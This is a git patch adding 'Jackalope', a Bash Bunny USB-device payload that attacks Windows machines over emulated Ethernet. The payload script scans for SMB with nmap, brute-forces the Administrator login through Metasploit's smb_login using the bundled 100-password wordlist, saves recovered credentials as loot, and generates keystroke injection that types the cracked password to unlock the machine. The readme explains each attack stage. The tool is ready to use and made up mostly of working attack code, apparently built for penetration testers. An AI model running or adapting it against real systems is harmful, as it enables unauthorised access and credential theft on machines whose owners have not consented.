From f171837db2170a4a41ee25d79dd4dd6450ab816d Mon Sep 17 00:00:00 2001 From: Catatonic Date: Wed, 22 May 2019 16:53:59 -0700 Subject: [PATCH] Add Jackalope (#380) * Adding Jackalope, a Bunny+Metasploit chimera project. * Fixing inaccurate documentation. * Generate the password entry payload on the alternate switch. * Additional documentation concerning alternate payload mechanism. * Branding * Update readme.md * rearchitecting payload to be independent. No longer overwrites alternate payload location. Uses WAIT interface to interact with the tester to reuse a password, clear the password, and re-attack the machine. --- .../library/credentials/Jackalope/payload.txt | 118 ++++++++++++++++++ .../library/credentials/Jackalope/readme.md | 49 ++++++++ .../credentials/Jackalope/userlist.txt | 1 + .../credentials/Jackalope/wordlist.txt | 100 +++++++++++++++ 4 files changed, 268 insertions(+) create mode 100644 payloads/library/credentials/Jackalope/payload.txt create mode 100644 payloads/library/credentials/Jackalope/readme.md create mode 100644 payloads/library/credentials/Jackalope/userlist.txt create mode 100644 payloads/library/credentials/Jackalope/wordlist.txt diff --git a/payloads/library/credentials/Jackalope/payload.txt b/payloads/library/credentials/Jackalope/payload.txt new file mode 100644 index 00000000..03e93196 --- /dev/null +++ b/payloads/library/credentials/Jackalope/payload.txt @@ -0,0 +1,118 @@ +#!/bin/bash +# +# Title: Jackalope +# Author: catatonic +# Version: 1.1.0 + +# Check readiness & prepare environment +LED SETUP + +# REQUIRE-TOOL metasploit-framework +ATTACKMODE HID RNDIS_ETHERNET + +# Ensure loot is available for recording results. +mount /dev/nandf /root/udisk/ + +ORIGINAL_SWITCH=$SWITCH_POSITION +PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION +LOOTBASE=/root/udisk/loot/Jackalope/ + +# SETUP +GET TARGET_IP +GET TARGET_HOSTNAME + +COUNT=$(ls -lad $LOOTBASE/$TARGET_HOSTNAME* | wc -l) +COUNT=$((COUNT+1)) +LOOTDIR=$LOOTBASE/$TARGET_HOSTNAME-$COUNT +mkdir -p $LOOTDIR + +source /etc/profile.d/rvm.sh +rvm --default use 2.6.2 >> $LOOTDIR/log.txt +MSF_DIR=/tools/metasploit-framework + +# Save environment informaiton: +echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt +echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt +echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt +echo "TARGET_IP: $TARGET_IP" >> $LOOTDIR/log.txt +echo "TARGET_HOSTNAME: $TARGET_HOSTNAME" >> $LOOTDIR/log.txt + +SYNC () +{ + sync; sleep 1; sync +} +CLEAR_PW() +{ + LED SPECIAL + rm $PAYLOAD_DIR/quack_pass.txt + SYNC + WAIT +} +ENTER_PW() +{ + sleep 1 + QUACK $ORIGINAL_SWITCH/quack_pass.txt + QUACK ENTER +} +RECON() +{ + ATTACKMODE RNDIS_ETHERNET + # Stage 1: Recon + LED STAGE1 + echo "Executing nmap..." >> $LOOTDIR/log.txt + nmap -p 445 -Pn $TARGET_IP > $LOOTDIR/nmap_results.txt + if ! grep --quiet "445.*open" $LOOTDIR/nmap_results.txt; + then + LED FAIL2 + SYNC + exit + fi +} +EXPLOIT() +{ + # Stage 2: Exploit + LED STAGE2 + export HOME=/root + cd $MSF_DIR + ./msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set RHOSTS $TARGET_IP; set USER_FILE $PAYLOAD_DIR/userlist.txt; set PASS_FILE $PAYLOAD_DIR/wordlist.txt; run; exit" > $LOOTDIR/msfconsole.txt + + if ! grep --quiet "^\[+\]" $LOOTDIR/msfconsole.txt; + then + LED FAIL + echo "Payload failed, no logins found..." >> $LOOTDIR/log.txt + SYNC + exit + fi + + grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 1 | cut -d "'" -f 2 > $LOOTDIR/user.txt + grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 2 | cut -d "'" -f 1 > $LOOTDIR/password.txt + + # Focus needs to be set on the password field manually. + echo -n "STRING " > $PAYLOAD_DIR/quack_pass.txt + cat $LOOTDIR/password.txt >> $PAYLOAD_DIR/quack_pass.txt + + SYNC +} + +# High level view. +while true +do + if [ -f $PAYLOAD_DIR/quack_pass.txt ]; + then + LED FINISH + else + RECON + EXPLOIT + continue + fi + + WAIT + + # User's choice, clear old password or enter password. + if [ "$SWITCH_POSITION" == "switch3" ]; + then + CLEAR_PW + else + ENTER_PW + fi +done \ No newline at end of file diff --git a/payloads/library/credentials/Jackalope/readme.md b/payloads/library/credentials/Jackalope/readme.md new file mode 100644 index 00000000..40f2f4e7 --- /dev/null +++ b/payloads/library/credentials/Jackalope/readme.md @@ -0,0 +1,49 @@ +# Jackalope +``` + `\ # # /' + | \ # # /;| + \ :\# #|; / + \./#_#\./ + / \ + : O O " + | \ / | + \ v / + \_x_/ + +Jackalope + by: catatonic +``` +* Author: catatonic +* Target: Windows (for now) + +## Description + +Uses ethernet to attempt dictionary attacks against passwords. When the password is discovered a payload is automatically generated and placed in the alternate switch location. This alternate payload may be used to unlock the machine by: + +1. Checking loot OR... +2. Manually select user/password at login screen +3. Flip switch to alternate payload to enter password + +To clear an already identified password from a GREEN status light, flip the switch to switch3 (arming) and the status light will change to SPECIAL (cyan). + +## Configuration +No initial configuration is required for bunny firmware v1.6+. + +### Per attack configuration +1. userlist.txt contains usernames to use in attack. +2. wordlist.txt contains passwords to use in attack. + +Note: A fantastic collection of password wordlists are available: [SecLists](https://github.com/danielmiessler/SecLists) + +## STATUS + +| LED | Status | +| ----------------------- | ---------------------------------------------- | +| FAIL | Attack failed, username/password not found | +| FAIL2 | Attack failed, network inaccessible | +| STAGE 1 | Stage 1: checking for SMB port with nmap | +| STAGE 2 | Stage 2: Brute forcing | +| Green (solid) | Attack complete, check loot or flip switch to switch1 or switch2 to enter password. Flip switch to switch3 (arming) to clear password. | +| SPECIAL | Clearing/cleared password, flip switch to switch 1 or switch 2 to initiate attack. | +| Purple (solid) | Preparing to attack | + diff --git a/payloads/library/credentials/Jackalope/userlist.txt b/payloads/library/credentials/Jackalope/userlist.txt new file mode 100644 index 00000000..56a3a34a --- /dev/null +++ b/payloads/library/credentials/Jackalope/userlist.txt @@ -0,0 +1 @@ +Administrator \ No newline at end of file diff --git a/payloads/library/credentials/Jackalope/wordlist.txt b/payloads/library/credentials/Jackalope/wordlist.txt new file mode 100644 index 00000000..18da5660 --- /dev/null +++ b/payloads/library/credentials/Jackalope/wordlist.txt @@ -0,0 +1,100 @@ +123456 +password +12345678 +qwerty +123456789 +12345 +1234 +111111 +1234567 +dragon +123123 +baseball +abc123 +football +monkey +letmein +696969 +shadow +master +666666 +qwertyuiop +123321 +mustang +1234567890 +michael +654321 +pussy +superman +1qaz2wsx +7777777 +fuckyou +121212 +000000 +qazwsx +123qwe +killer +trustno1 +jordan +jennifer +zxcvbnm +asdfgh +hunter +buster +soccer +harley +batman +andrew +tigger +sunshine +iloveyou +fuckme +2000 +charlie +robert +thomas +hockey +ranger +daniel +starwars +klaster +112233 +george +asshole +computer +michelle +jessica +pepper +1111 +zxcvbn +555555 +11111111 +131313 +freedom +777777 +pass +fuck +maggie +159753 +aaaaaa +ginger +princess +joshua +cheese +amanda +summer +love +ashley +6969 +nicole +chelsea +biteme +matthew +access +yankees +987654321 +dallas +austin +thunder +taylor +matrix \ No newline at end of file